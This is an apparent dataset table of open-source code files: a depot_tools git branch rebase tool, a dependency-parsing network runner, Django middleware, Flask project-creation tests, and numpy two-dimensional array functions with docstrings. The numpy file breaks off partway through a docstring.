repo_name
stringlengths 5
100
| path
stringlengths 4
375
| copies
stringclasses 991
values | size
stringlengths 4
7
| content
stringlengths 666
1M
| license
stringclasses 15
values |
---|---|---|---|---|---|
junhuac/MQUIC | depot_tools/git_rebase_update.py | 1 | 11254 | #!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Tool to update all branches to have the latest changes from their upstreams.
"""
import argparse
import collections
import logging
import sys
import textwrap
import os
from fnmatch import fnmatch
from pprint import pformat
import git_common as git
STARTING_BRANCH_KEY = 'depot-tools.rebase-update.starting-branch'
STARTING_WORKDIR_KEY = 'depot-tools.rebase-update.starting-workdir'
def find_return_branch_workdir():
"""Finds the branch and working directory which we should return to after
rebase-update completes.
These values may persist across multiple invocations of rebase-update, if
rebase-update runs into a conflict mid-way.
"""
return_branch = git.config(STARTING_BRANCH_KEY)
workdir = git.config(STARTING_WORKDIR_KEY)
if not return_branch:
workdir = os.getcwd()
git.set_config(STARTING_WORKDIR_KEY, workdir)
return_branch = git.current_branch()
if return_branch != 'HEAD':
git.set_config(STARTING_BRANCH_KEY, return_branch)
return return_branch, workdir
def fetch_remotes(branch_tree):
"""Fetches all remotes which are needed to update |branch_tree|."""
fetch_tags = False
remotes = set()
tag_set = git.tags()
fetchspec_map = {}
all_fetchspec_configs = git.config_regexp(r'^remote\..*\.fetch')
for fetchspec_config in all_fetchspec_configs:
key, _, fetchspec = fetchspec_config.partition(' ')
dest_spec = fetchspec.partition(':')[2]
remote_name = key.split('.')[1]
fetchspec_map[dest_spec] = remote_name
for parent in branch_tree.itervalues():
if parent in tag_set:
fetch_tags = True
else:
full_ref = git.run('rev-parse', '--symbolic-full-name', parent)
for dest_spec, remote_name in fetchspec_map.iteritems():
if fnmatch(full_ref, dest_spec):
remotes.add(remote_name)
break
fetch_args = []
if fetch_tags:
# Need to fetch all because we don't know what remote the tag comes from :(
# TODO(iannucci): assert that the tags are in the remote fetch refspec
fetch_args = ['--all']
else:
fetch_args.append('--multiple')
fetch_args.extend(remotes)
# TODO(iannucci): Should we fetch git-svn?
if not fetch_args: # pragma: no cover
print 'Nothing to fetch.'
else:
git.run_with_stderr('fetch', *fetch_args, stdout=sys.stdout,
stderr=sys.stderr)
def remove_empty_branches(branch_tree):
tag_set = git.tags()
ensure_root_checkout = git.once(lambda: git.run('checkout', git.root()))
deletions = {}
reparents = {}
downstreams = collections.defaultdict(list)
for branch, parent in git.topo_iter(branch_tree, top_down=False):
downstreams[parent].append(branch)
# If branch and parent have the same tree, then branch has to be marked
# for deletion and its children and grand-children reparented to parent.
if git.hash_one(branch+":") == git.hash_one(parent+":"):
ensure_root_checkout()
logging.debug('branch %s merged to %s', branch, parent)
# Mark branch for deletion while remembering the ordering, then add all
# its children as grand-children of its parent and record reparenting
# information if necessary.
deletions[branch] = len(deletions)
for down in downstreams[branch]:
if down in deletions:
continue
# Record the new and old parent for down, or update such a record
# if it already exists. Keep track of the ordering so that reparenting
# happen in topological order.
downstreams[parent].append(down)
if down not in reparents:
reparents[down] = (len(reparents), parent, branch)
else:
order, _, old_parent = reparents[down]
reparents[down] = (order, parent, old_parent)
# Apply all reparenting recorded, in order.
for branch, value in sorted(reparents.iteritems(), key=lambda x:x[1][0]):
_, parent, old_parent = value
if parent in tag_set:
git.set_branch_config(branch, 'remote', '.')
git.set_branch_config(branch, 'merge', 'refs/tags/%s' % parent)
print ('Reparented %s to track %s [tag] (was tracking %s)'
% (branch, parent, old_parent))
else:
git.run('branch', '--set-upstream-to', parent, branch)
print ('Reparented %s to track %s (was tracking %s)'
% (branch, parent, old_parent))
# Apply all deletions recorded, in order.
for branch, _ in sorted(deletions.iteritems(), key=lambda x: x[1]):
print git.run('branch', '-d', branch)
def rebase_branch(branch, parent, start_hash):
logging.debug('considering %s(%s) -> %s(%s) : %s',
branch, git.hash_one(branch), parent, git.hash_one(parent),
start_hash)
# If parent has FROZEN commits, don't base branch on top of them. Instead,
# base branch on top of whatever commit is before them.
back_ups = 0
orig_parent = parent
while git.run('log', '-n1', '--format=%s',
parent, '--').startswith(git.FREEZE):
back_ups += 1
parent = git.run('rev-parse', parent+'~')
if back_ups:
logging.debug('Backed parent up by %d from %s to %s',
back_ups, orig_parent, parent)
if git.hash_one(parent) != start_hash:
# Try a plain rebase first
print 'Rebasing:', branch
rebase_ret = git.rebase(parent, start_hash, branch, abort=True)
if not rebase_ret.success:
# TODO(iannucci): Find collapsible branches in a smarter way?
print "Failed! Attempting to squash", branch, "...",
squash_branch = branch+"_squash_attempt"
git.run('checkout', '-b', squash_branch)
git.squash_current_branch(merge_base=start_hash)
# Try to rebase the branch_squash_attempt branch to see if it's empty.
squash_ret = git.rebase(parent, start_hash, squash_branch, abort=True)
empty_rebase = git.hash_one(squash_branch) == git.hash_one(parent)
git.run('checkout', branch)
git.run('branch', '-D', squash_branch)
if squash_ret.success and empty_rebase:
print 'Success!'
git.squash_current_branch(merge_base=start_hash)
git.rebase(parent, start_hash, branch)
else:
print "Failed!"
print
# rebase and leave in mid-rebase state.
# This second rebase attempt should always fail in the same
# way that the first one does. If it magically succeeds then
# something very strange has happened.
second_rebase_ret = git.rebase(parent, start_hash, branch)
if second_rebase_ret.success: # pragma: no cover
print "Second rebase succeeded unexpectedly!"
print "Please see: http://crbug.com/425696"
print "First rebased failed with:"
print rebase_ret.stderr
else:
print "Here's what git-rebase (squashed) had to say:"
print
print squash_ret.stdout
print squash_ret.stderr
print textwrap.dedent(
"""\
Squashing failed. You probably have a real merge conflict.
Your working copy is in mid-rebase. Either:
* completely resolve like a normal git-rebase; OR
* abort the rebase and mark this branch as dormant:
git config branch.%s.dormant true
And then run `git rebase-update` again to resume.
""" % branch)
return False
else:
print '%s up-to-date' % branch
git.remove_merge_base(branch)
git.get_or_create_merge_base(branch)
return True
def main(args=None):
parser = argparse.ArgumentParser()
parser.add_argument('--verbose', '-v', action='store_true')
parser.add_argument('--keep-going', '-k', action='store_true',
help='Keep processing past failed rebases.')
parser.add_argument('--no_fetch', '--no-fetch', '-n',
action='store_true',
help='Skip fetching remotes.')
opts = parser.parse_args(args)
if opts.verbose: # pragma: no cover
logging.getLogger().setLevel(logging.DEBUG)
# TODO(iannucci): snapshot all branches somehow, so we can implement
# `git rebase-update --undo`.
# * Perhaps just copy packed-refs + refs/ + logs/ to the side?
# * commit them to a secret ref?
# * Then we could view a summary of each run as a
# `diff --stat` on that secret ref.
if git.in_rebase():
# TODO(iannucci): Be able to resume rebase with flags like --continue,
# etc.
print (
'Rebase in progress. Please complete the rebase before running '
'`git rebase-update`.'
)
return 1
return_branch, return_workdir = find_return_branch_workdir()
os.chdir(git.run('rev-parse', '--show-toplevel'))
if git.current_branch() == 'HEAD':
if git.run('status', '--porcelain'):
print 'Cannot rebase-update with detached head + uncommitted changes.'
return 1
else:
git.freeze() # just in case there are any local changes.
skipped, branch_tree = git.get_branch_tree()
for branch in skipped:
print 'Skipping %s: No upstream specified' % branch
if not opts.no_fetch:
fetch_remotes(branch_tree)
merge_base = {}
for branch, parent in branch_tree.iteritems():
merge_base[branch] = git.get_or_create_merge_base(branch, parent)
logging.debug('branch_tree: %s' % pformat(branch_tree))
logging.debug('merge_base: %s' % pformat(merge_base))
retcode = 0
unrebased_branches = []
# Rebase each branch starting with the root-most branches and working
# towards the leaves.
for branch, parent in git.topo_iter(branch_tree):
if git.is_dormant(branch):
print 'Skipping dormant branch', branch
else:
ret = rebase_branch(branch, parent, merge_base[branch])
if not ret:
retcode = 1
if opts.keep_going:
print '--keep-going set, continuing with next branch.'
unrebased_branches.append(branch)
if git.in_rebase():
git.run_with_retcode('rebase', '--abort')
if git.in_rebase(): # pragma: no cover
print 'Failed to abort rebase. Something is really wrong.'
break
else:
break
if unrebased_branches:
print
print 'The following branches could not be cleanly rebased:'
for branch in unrebased_branches:
print ' %s' % branch
if not retcode:
remove_empty_branches(branch_tree)
# return_branch may not be there any more.
if return_branch in git.branches():
git.run('checkout', return_branch)
git.thaw()
else:
root_branch = git.root()
if return_branch != 'HEAD':
print (
"%r was merged with its parent, checking out %r instead."
% (return_branch, root_branch)
)
git.run('checkout', root_branch)
if return_workdir:
os.chdir(return_workdir)
git.set_config(STARTING_BRANCH_KEY, '')
git.set_config(STARTING_WORKDIR_KEY, '')
return retcode
if __name__ == '__main__': # pragma: no cover
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(1)
| mit |
MultiPath/Dep-Compo | execute.py | 1 | 1033 | #/usr/bin/python2.7
#*-coding:utf-8-*-
from structure import DependencyTree
from DepNN import DepNN
#Main class to execute the task.
class Execute(object):
def __init__(self):
self.depnn = DepNN()
self.depnn.extendLookUp('../data/depcheck2')
self.depnn.load_wordvector('../data/word-vec.bin')
self.deptree = DependencyTree()
def build_model(self):
self.depnn.build_AutoEncoder(200, '../data/compilation.bin')
def load_model(self):
self.depnn.load_AutoEncoder('../data/compilation.bin')
def train_sentence(self, lines):
w = self.deptree.read_sent(lines[0])
y = self.deptree.read_dependency(lines[1])
#self.depnn.saveRAE('../data/weights.bin')
#self.depnn.loadRAE('../data/weights.bin')
print ' '.join(x[0] for x in w)
self.depnn.build_DepRNN_Tree(y)
def dump_weights(self, db_file):
self.depnn.saveRAE(db_file)
def load_weights(self, db_file):
self.depnn.loadRAE(db_file)
| gpl-2.0 |
FreeAgent/djangoappengine-starter | djangotoolbox/middleware.py | 85 | 2801 | from django.conf import settings
from django.http import HttpResponseRedirect
from django.utils.cache import patch_cache_control
LOGIN_REQUIRED_PREFIXES = getattr(settings, 'LOGIN_REQUIRED_PREFIXES', ())
NO_LOGIN_REQUIRED_PREFIXES = getattr(settings, 'NO_LOGIN_REQUIRED_PREFIXES', ())
ALLOWED_DOMAINS = getattr(settings, 'ALLOWED_DOMAINS', None)
NON_REDIRECTED_PATHS = getattr(settings, 'NON_REDIRECTED_PATHS', ())
NON_REDIRECTED_BASE_PATHS = tuple(path.rstrip('/') + '/'
for path in NON_REDIRECTED_PATHS)
class LoginRequiredMiddleware(object):
"""
Redirects to login page if request path begins with a
LOGIN_REQURED_PREFIXES prefix. You can also specify
NO_LOGIN_REQUIRED_PREFIXES which take precedence.
"""
def process_request(self, request):
for prefix in NO_LOGIN_REQUIRED_PREFIXES:
if request.path.startswith(prefix):
return None
for prefix in LOGIN_REQUIRED_PREFIXES:
if request.path.startswith(prefix) and \
not request.user.is_authenticated():
from django.contrib.auth.views import redirect_to_login
return redirect_to_login(request.get_full_path())
return None
class RedirectMiddleware(object):
"""
A static redirect middleware. Mostly useful for hosting providers that
automatically setup an alternative domain for your website. You might
not want anyone to access the site via those possibly well-known URLs.
"""
def process_request(self, request):
host = request.get_host().split(':')[0]
# Turn off redirects when in debug mode, running unit tests, or
# when handling an App Engine cron job.
if (settings.DEBUG or host == 'testserver' or
not ALLOWED_DOMAINS or
request.META.get('HTTP_X_APPENGINE_CRON') == 'true' or
request.path.startswith('/_ah/') or
request.path in NON_REDIRECTED_PATHS or
request.path.startswith(NON_REDIRECTED_BASE_PATHS)):
return
if host not in settings.ALLOWED_DOMAINS:
return HttpResponseRedirect('http://' + settings.ALLOWED_DOMAINS[0]
+ request.path)
class NoHistoryCacheMiddleware(object):
"""
If user is authenticated we disable browser caching of pages in history.
"""
def process_response(self, request, response):
if 'Expires' not in response and \
'Cache-Control' not in response and \
hasattr(request, 'session') and \
request.user.is_authenticated():
patch_cache_control(response,
no_store=True, no_cache=True, must_revalidate=True, max_age=0)
return response
| bsd-3-clause |
soasme/rio | tests/blueprints/dashboard/test_views.py | 1 | 1243 | # -*- coding: utf-8 -*-
from flask import url_for
from flask_login import login_user
def test_new_project_require_name(client, login):
resp = client.post(url_for('dashboard.new_project'), data={'name': ''})
assert resp.status_code == 400
assert resp.json['errors']['name']
def test_new_project_success(client, login):
resp = client.post(url_for('dashboard.new_project'), data={'name': 'New Project'})
assert resp.status_code == 200
assert resp.json['id']
assert resp.json['name'] == 'New Project'
assert resp.json['slug'] == 'new-project'
assert resp.json['owner_id'] == login.id
def test_new_project_twice(client, login):
resp = client.post(url_for('dashboard.new_project'), data={'name': 'New Project'})
resp = client.post(url_for('dashboard.new_project'), data={'name': 'New Project'})
assert resp.status_code == 400
assert resp.json['errors']['name'] == ['duplicated slug.']
def test_new_project_insensive_slug(client, login):
resp = client.post(url_for('dashboard.new_project'), data={'name': 'New Project'})
assert resp.json['slug'] == 'new-project'
resp = client.post(url_for('dashboard.new_project'), data={'name': 'new project'})
assert resp.status_code == 400
| mit |
teoliphant/numpy-refactor | numpy/lib/twodim_base.py | 5 | 22944 | """ Basic functions for manipulating 2d arrays
"""
__all__ = ['diag','diagflat','eye','fliplr','flipud','rot90','tri','triu',
'tril','vander','histogram2d','mask_indices',
'tril_indices','tril_indices_from','triu_indices','triu_indices_from',
]
from numpy.core.numeric import asanyarray, equal, subtract, arange, \
zeros, greater_equal, multiply, ones, asarray, alltrue, where, \
empty
def fliplr(m):
"""
Flip array in the left/right direction.
Flip the entries in each row in the left/right direction.
Columns are preserved, but appear in a different order than before.
Parameters
----------
m : array_like
Input array.
Returns
-------
f : ndarray
A view of `m` with the columns reversed. Since a view
is returned, this operation is :math:`\\mathcal O(1)`.
See Also
--------
flipud : Flip array in the up/down direction.
rot90 : Rotate array counterclockwise.
Notes
-----
Equivalent to A[:,::-1]. Does not require the array to be
two-dimensional.
Examples
--------
>>> A = np.diag([1.,2.,3.])
>>> A
array([[ 1., 0., 0.],
[ 0., 2., 0.],
[ 0., 0., 3.]])
>>> np.fliplr(A)
array([[ 0., 0., 1.],
[ 0., 2., 0.],
[ 3., 0., 0.]])
>>> A = np.random.randn(2,3,5)
>>> np.all(np.fliplr(A)==A[:,::-1,...])
True
"""
m = asanyarray(m)
if m.ndim < 2:
raise ValueError, "Input must be >= 2-d."
return m[:, ::-1]
def flipud(m):
"""
Flip array in the up/down direction.
Flip the entries in each column in the up/down direction.
Rows are preserved, but appear in a different order than before.
Parameters
----------
m : array_like
Input array.
Returns
-------
out : array_like
A view of `m` with the rows reversed. Since a view is
returned, this operation is :math:`\\mathcal O(1)`.
See Also
--------
fliplr : Flip array in the left/right direction.
rot90 : Rotate array counterclockwise.
Notes
-----
Equivalent to ``A[::-1,...]``.
Does not require the array to be two-dimensional.
Examples
--------
>>> A = np.diag([1.0, 2, 3])
>>> A
array([[ 1., 0., 0.],
[ 0., 2., 0.],
[ 0., 0., 3.]])
>>> np.flipud(A)
array([[ 0., 0., 3.],
[ 0., 2., 0.],
[ 1., 0., 0.]])
>>> A = np.random.randn(2,3,5)
>>> np.all(np.flipud(A)==A[::-1,...])
True
>>> np.flipud([1,2])
array([2, 1])
"""
m = asanyarray(m)
if m.ndim < 1:
raise ValueError, "Input must be >= 1-d."
return m[::-1,...]
def rot90(m, k=1):
"""
Rotate an array by 90 degrees in the counter-clockwise direction.
The first two dimensions are rotated; therefore, the array must be at
least 2-D.
Parameters
----------
m : array_like
Array of two or more dimensions.
k : integer
Number of times the array is rotated by 90 degrees.
Returns
-------
y : ndarray
Rotated array.
See Also
--------
fliplr : Flip an array horizontally.
flipud : Flip an array vertically.
Examples
--------
>>> m = np.array([[1,2],[3,4]], int)
>>> m
array([[1, 2],
[3, 4]])
>>> np.rot90(m)
array([[2, 4],
[1, 3]])
>>> np.rot90(m, 2)
array([[4, 3],
[2, 1]])
"""
m = asanyarray(m)
if m.ndim < 2:
raise ValueError, "Input must >= 2-d."
k = k % 4
if k == 0: return m
elif k == 1: return fliplr(m).swapaxes(0,1)
elif k == 2: return fliplr(flipud(m))
else: return fliplr(m.swapaxes(0,1)) # k==3
def eye(N, M=None, k=0, dtype=float):
"""
Return a 2-D array with ones on the diagonal and zeros elsewhere.
Parameters
----------
N : int
Number of rows in the output.
M : int, optional
Number of columns in the output. If None, defaults to `N`.
k : int, optional
Index of the diagonal: 0 refers to the main diagonal, a positive value
refers to an upper diagonal, and a negative value to a lower diagonal.
dtype : dtype, optional
Data-type of the returned array.
Returns
-------
I : ndarray (N,M)
An array where all elements are equal to zero, except for the `k`-th
diagonal, whose values are equal to one.
See Also
--------
diag : Return a diagonal 2-D array using a 1-D array specified by the user.
Examples
--------
>>> np.eye(2, dtype=int)
array([[1, 0],
[0, 1]])
>>> np.eye(3, k=1)
array([[ 0., 1., 0.],
[ 0., 0., 1.],
[ 0., 0., 0.]])
"""
if M is None:
M = N
m = zeros((N, M), dtype=dtype)
if k >= M:
return m
if k >= 0:
i = k
else:
i = (-k) * M
m[:M-k].flat[i::M+1] = 1
return m
def diag(v, k=0):
"""
Extract a diagonal or construct a diagonal array.
Parameters
----------
v : array_like
If `v` is a 2-D array, return a copy of its `k`-th diagonal.
If `v` is a 1-D array, return a 2-D array with `v` on the `k`-th
diagonal.
k : int, optional
Diagonal in question. The default is 0. Use `k>0` for diagonals
above the main diagonal, and `k<0` for diagonals below the main
diagonal.
Returns
-------
out : ndarray
The extracted diagonal or constructed diagonal array.
See Also
--------
diagonal : Return specified diagonals.
diagflat : Create a 2-D array with the flattened input as a diagonal.
trace : Sum along diagonals.
triu : Upper triangle of an array.
tril : Lower triange of an array.
Examples
--------
>>> x = np.arange(9).reshape((3,3))
>>> x
array([[0, 1, 2],
[3, 4, 5],
[6, 7, 8]])
>>> np.diag(x)
array([0, 4, 8])
>>> np.diag(x, k=1)
array([1, 5])
>>> np.diag(x, k=-1)
array([3, 7])
>>> np.diag(np.diag(x))
array([[0, 0, 0],
[0, 4, 0],
[0, 0, 8]])
"""
v = asarray(v)
s = v.shape
if len(s) == 1:
n = s[0]+abs(k)
res = zeros((n,n), v.dtype)
if k >= 0:
i = k
else:
i = (-k) * n
res[:n-k].flat[i::n+1] = v
return res
elif len(s) == 2:
if k >= s[1]:
return empty(0, dtype=v.dtype)
if v.flags.f_contiguous:
# faster slicing
v, k, s = v.T, -k, s[::-1]
if k >= 0:
i = k
else:
i = (-k) * s[1]
return v[:s[1]-k].flat[i::s[1]+1]
else:
raise ValueError, "Input must be 1- or 2-d."
def diagflat(v,k=0):
"""
Create a two-dimensional array with the flattened input as a diagonal.
Parameters
----------
v : array_like
Input data, which is flattened and set as the `k`-th
diagonal of the output.
k : int, optional
Diagonal to set. The default is 0.
Returns
-------
out : ndarray
The 2-D output array.
See Also
--------
diag : Matlab workalike for 1-D and 2-D arrays.
diagonal : Return specified diagonals.
trace : Sum along diagonals.
Examples
--------
>>> np.diagflat([[1,2], [3,4]])
array([[1, 0, 0, 0],
[0, 2, 0, 0],
[0, 0, 3, 0],
[0, 0, 0, 4]])
>>> np.diagflat([1,2], 1)
array([[0, 1, 0],
[0, 0, 2],
[0, 0, 0]])
"""
try:
wrap = v.__array_wrap__
except AttributeError:
wrap = None
v = asarray(v).ravel()
s = len(v)
n = s + abs(k)
res = zeros((n,n), v.dtype)
if (k>=0):
i = arange(0,n-k)
fi = i+k+i*n
else:
i = arange(0,n+k)
fi = i+(i-k)*n
res.flat[fi] = v
if not wrap:
return res
return wrap(res)
def tri(N, M=None, k=0, dtype=float):
"""
Construct an array filled with ones at and below the given diagonal.
Parameters
----------
N : int
Number of rows in the array.
M : int, optional
Number of columns in the array.
By default, `M` is taken equal to `N`.
k : int, optional
The sub-diagonal below which the array is filled.
`k` = 0 is the main diagonal, while `k` < 0 is below it,
and `k` > 0 is above. The default is 0.
dtype : dtype, optional
Data type of the returned array. The default is float.
Returns
-------
T : (N,M) ndarray
Array with a lower triangle filled with ones, in other words
``T[i,j] == 1`` for ``i <= j + k``.
Examples
--------
>>> np.tri(3, 5, 2, dtype=int)
array([[1, 1, 1, 0, 0],
[1, 1, 1, 1, 0],
[1, 1, 1, 1, 1]])
>>> np.tri(3, 5, -1)
array([[ 0., 0., 0., 0., 0.],
[ 1., 0., 0., 0., 0.],
[ 1., 1., 0., 0., 0.]])
"""
if M is None: M = N
m = greater_equal(subtract.outer(arange(N), arange(M)),-k)
return m.astype(dtype)
def tril(m, k=0):
"""
Lower triangle of an array.
Return a copy of an array with elements above the `k`-th diagonal zeroed.
Parameters
----------
m : array_like, shape (M, N)
Input array.
k : int
Diagonal above which to zero elements.
`k = 0` is the main diagonal, `k < 0` is below it and `k > 0` is above.
Returns
-------
L : ndarray, shape (M, N)
Lower triangle of `m`, of same shape and data-type as `m`.
See Also
--------
triu
Examples
--------
>>> np.tril([[1,2,3],[4,5,6],[7,8,9],[10,11,12]], -1)
array([[ 0, 0, 0],
[ 4, 0, 0],
[ 7, 8, 0],
[10, 11, 12]])
"""
m = asanyarray(m)
out = multiply(tri(m.shape[0], m.shape[1], k=k, dtype=int),m)
return out
def triu(m, k=0):
"""
Upper triangle of an array.
Construct a copy of a matrix with elements below the k-th diagonal zeroed.
Please refer to the documentation for `tril`.
See Also
--------
tril
Examples
--------
>>> np.triu([[1,2,3],[4,5,6],[7,8,9],[10,11,12]], -1)
array([[ 1, 2, 3],
[ 4, 5, 6],
[ 0, 8, 9],
[ 0, 0, 12]])
"""
m = asanyarray(m)
out = multiply((1-tri(m.shape[0], m.shape[1], k-1, int)),m)
return out
# borrowed from John Hunter and matplotlib
def vander(x, N=None):
"""
Generate a Van der Monde matrix.
The columns of the output matrix are decreasing powers of the input
vector. Specifically, the i-th output column is the input vector to
the power of ``N - i - 1``. Such a matrix with a geometric progression
in each row is named Van Der Monde, or Vandermonde matrix, from
Alexandre-Theophile Vandermonde.
Parameters
----------
x : array_like
1-D input array.
N : int, optional
Order of (number of columns in) the output. If `N` is not specified,
a square array is returned (``N = len(x)``).
Returns
-------
out : ndarray
Van der Monde matrix of order `N`. The first column is ``x^(N-1)``,
the second ``x^(N-2)`` and so forth.
References
----------
.. [1] Wikipedia, "Vandermonde matrix",
http://en.wikipedia.org/wiki/Vandermonde_matrix
Examples
--------
>>> x = np.array([1, 2, 3, 5])
>>> N = 3
>>> np.vander(x, N)
array([[ 1, 1, 1],
[ 4, 2, 1],
[ 9, 3, 1],
[25, 5, 1]])
>>> np.column_stack([x**(N-1-i) for i in range(N)])
array([[ 1, 1, 1],
[ 4, 2, 1],
[ 9, 3, 1],
[25, 5, 1]])
>>> x = np.array([1, 2, 3, 5])
>>> np.vander(x)
array([[ 1, 1, 1, 1],
[ 8, 4, 2, 1],
[ 27, 9, 3, 1],
[125, 25, 5, 1]])
The determinant of a square Vandermonde matrix is the product
of the differences between the values of the input vector:
>>> np.linalg.det(np.vander(x))
48.000000000000043
>>> (5-3)*(5-2)*(5-1)*(3-2)*(3-1)*(2-1)
48
"""
x = asarray(x)
if N is None: N=len(x)
X = ones( (len(x),N), x.dtype)
for i in range(N-1):
X[:,i] = x**(N-i-1)
return X
def histogram2d(x,y, bins=10, range=None, normed=False, weights=None):
"""
Compute the bi-dimensional histogram of two data samples.
Parameters
----------
x : array_like, shape(N,)
A sequence of values to be histogrammed along the first dimension.
y : array_like, shape(M,)
A sequence of values to be histogrammed along the second dimension.
bins : int or [int, int] or array_like or [array, array], optional
The bin specification:
* If int, the number of bins for the two dimensions (nx=ny=bins).
* If [int, int], the number of bins in each dimension (nx, ny = bins).
* If array_like, the bin edges for the two dimensions (x_edges=y_edges=bins).
* If [array, array], the bin edges in each dimension (x_edges, y_edges = bins).
range : array_like, shape(2,2), optional
The leftmost and rightmost edges of the bins along each dimension
(if not specified explicitly in the `bins` parameters):
``[[xmin, xmax], [ymin, ymax]]``. All values outside of this range
will be considered outliers and not tallied in the histogram.
normed : bool, optional
If False, returns the number of samples in each bin. If True, returns
the bin density, i.e. the bin count divided by the bin area.
weights : array_like, shape(N,), optional
An array of values ``w_i`` weighing each sample ``(x_i, y_i)``. Weights
are normalized to 1 if `normed` is True. If `normed` is False, the
values of the returned histogram are equal to the sum of the weights
belonging to the samples falling into each bin.
Returns
-------
H : ndarray, shape(nx, ny)
The bi-dimensional histogram of samples `x` and `y`. Values in `x`
are histogrammed along the first dimension and values in `y` are
histogrammed along the second dimension.
xedges : ndarray, shape(nx,)
The bin edges along the first dimension.
yedges : ndarray, shape(ny,)
The bin edges along the second dimension.
See Also
--------
histogram: 1D histogram
histogramdd: Multidimensional histogram
Notes
-----
When `normed` is True, then the returned histogram is the sample density,
defined such that:
.. math::
\\sum_{i=0}^{nx-1} \\sum_{j=0}^{ny-1} H_{i,j} \\Delta x_i \\Delta y_j = 1
where `H` is the histogram array and :math:`\\Delta x_i \\Delta y_i`
the area of bin `{i,j}`.
Please note that the histogram does not follow the Cartesian convention
where `x` values are on the abcissa and `y` values on the ordinate axis.
Rather, `x` is histogrammed along the first dimension of the array
(vertical), and `y` along the second dimension of the array (horizontal).
This ensures compatibility with `histogramdd`.
Examples
--------
>>> x, y = np.random.randn(2, 100)
>>> H, xedges, yedges = np.histogram2d(x, y, bins=(5, 8))
>>> H.shape, xedges.shape, yedges.shape
((5, 8), (6,), (9,))
We can now use the Matplotlib to visualize this 2-dimensional histogram:
>>> extent = [xedges[0], xedges[-1], yedges[0], yedges[-1]]
>>> import matplotlib.pyplot as plt
>>> plt.imshow(H, extent=extent)
<matplotlib.image.AxesImage object at ...>
>>> plt.show()
"""
from numpy import histogramdd
try:
N = len(bins)
except TypeError:
N = 1
if N != 1 and N != 2:
xedges = yedges = asarray(bins, float)
bins = [xedges, yedges]
hist, edges = histogramdd([x,y], bins, range, normed, weights)
return hist, edges[0], edges[1]
def mask_indices(n,mask_func,k=0):
"""
Return the indices to access (n, n) arrays, given a masking function.
Assume `mask_func` is a function that, for a square array a of size
``(n, n)`` with a possible offset argument `k`, when called as
``mask_func(a, k)`` returns a new array with zeros in certain locations
(functions like `triu` or `tril` do precisely this). Then this function
returns the indices where the non-zero values would be located.
Parameters
----------
n : int
The returned indices will be valid to access arrays of shape (n, n).
mask_func : callable
A function whose call signature is similar to that of `triu`, `tril`.
That is, ``mask_func(x, k)`` returns a boolean array, shaped like `x`.
`k` is an optional argument to the function.
k : scalar
An optional argument which is passed through to `mask_func`. Functions
like `triu`, `tril` take a second argument that is interpreted as an
offset.
Returns
-------
indices : tuple of arrays.
The `n` arrays of indices corresponding to the locations where
``mask_func(np.ones((n, n)), k)`` is True.
See Also
--------
triu, tril, triu_indices, tril_indices
Notes
-----
.. versionadded:: 1.4.0
Examples
--------
These are the indices that would allow you to access the upper triangular
part of any 3x3 array:
>>> iu = np.mask_indices(3, np.triu)
For example, if `a` is a 3x3 array:
>>> a = np.arange(9).reshape(3, 3)
>>> a
array([[0, 1, 2],
[3, 4, 5],
[6, 7, 8]])
>>> a[iu]
array([0, 1, 2, 4, 5, 8])
An offset can be passed also to the masking function. This gets us the
indices starting on the first diagonal right of the main one:
>>> iu1 = np.mask_indices(3, np.triu, 1)
with which we now extract only three elements:
>>> a[iu1]
array([1, 2, 5])
"""
m = ones((n,n),int)
a = mask_func(m,k)
return where(a != 0)
def tril_indices(n,k=0):
"""
Return the indices for the lower-triangle of an (n, n) array.
Parameters
----------
n : int
Sets the size of the arrays for which the returned indices will be valid.
k : int, optional
Diagonal offset (see `tril` for details).
Returns
-------
inds : tuple of arrays
The indices for the triangle. The returned tuple contains two arrays,
each with the indices along one dimension of the array.
See also
--------
triu_indices : similar function, for upper-triangular.
mask_indices : generic function accepting an arbitrary mask function.
tril, triu
Notes
-----
.. versionadded:: 1.4.0
Examples
--------
Compute two different sets of indices to access 4x4 arrays, one for the
lower triangular part starting at the main diagonal, and one starting two
diagonals further right:
>>> il1 = np.tril_indices(4)
>>> il2 = np.tril_indices(4, 2)
Here is how they can be used with a sample array:
>>> a = np.arange(16).reshape(4, 4)
>>> a
array([[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11],
[12, 13, 14, 15]])
Both for indexing:
>>> a[il1]
array([ 0, 4, 5, 8, 9, 10, 12, 13, 14, 15])
And for assigning values:
>>> a[il1] = -1
>>> a
array([[-1, 1, 2, 3],
[-1, -1, 6, 7],
[-1, -1, -1, 11],
[-1, -1, -1, -1]])
These cover almost the whole array (two diagonals right of the main one):
>>> a[il2] = -10
>>> a
array([[-10, -10, -10, 3],
[-10, -10, -10, -10],
[-10, -10, -10, -10],
[-10, -10, -10, -10]])
"""
return mask_indices(n,tril,k)
def tril_indices_from(arr,k=0):
"""
Return the indices for the lower-triangle of an (n, n) array.
See `tril_indices` for full details.
Parameters
----------
n : int
Sets the size of the arrays for which the returned indices will be valid.
k : int, optional
Diagonal offset (see `tril` for details).
See Also
--------
tril_indices, tril
Notes
-----
.. versionadded:: 1.4.0
"""
if not arr.ndim==2 and arr.shape[0] == arr.shape[1]:
raise ValueError("input array must be 2-d and square")
return tril_indices(arr.shape[0],k)
def triu_indices(n,k=0):
"""
Return the indices for the upper-triangle of an (n, n) array.
Parameters
----------
n : int
Sets the size of the arrays for which the returned indices will be valid.
k : int, optional
Diagonal offset (see `triu` for details).
Returns
-------
inds : tuple of arrays
The indices for the triangle. The returned tuple contains two arrays,
each with the indices along one dimension of the array.
See also
--------
tril_indices : similar function, for lower-triangular.
mask_indices : generic function accepting an arbitrary mask function.
triu, tril
Notes
-----
.. versionadded:: 1.4.0
Examples
--------
Compute two different sets of indices to access 4x4 arrays, one for the
upper triangular part starting at the main diagonal, and one starting two
diagonals further right:
>>> iu1 = np.triu_indices(4)
>>> iu2 = np.triu_indices(4, 2)
Here is how they can be used with a sample array:
>>> a = np.arange(16).reshape(4, 4)
>>> a
array([[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11],
[12, 13, 14, 15]])
Both for indexing:
>>> a[iu1]
array([ 0, 1, 2, 3, 5, 6, 7, 10, 11, 15])
And for assigning values:
>>> a[iu1] = -1
>>> a
array([[-1, -1, -1, -1],
[ 4, -1, -1, -1],
[ 8, 9, -1, -1],
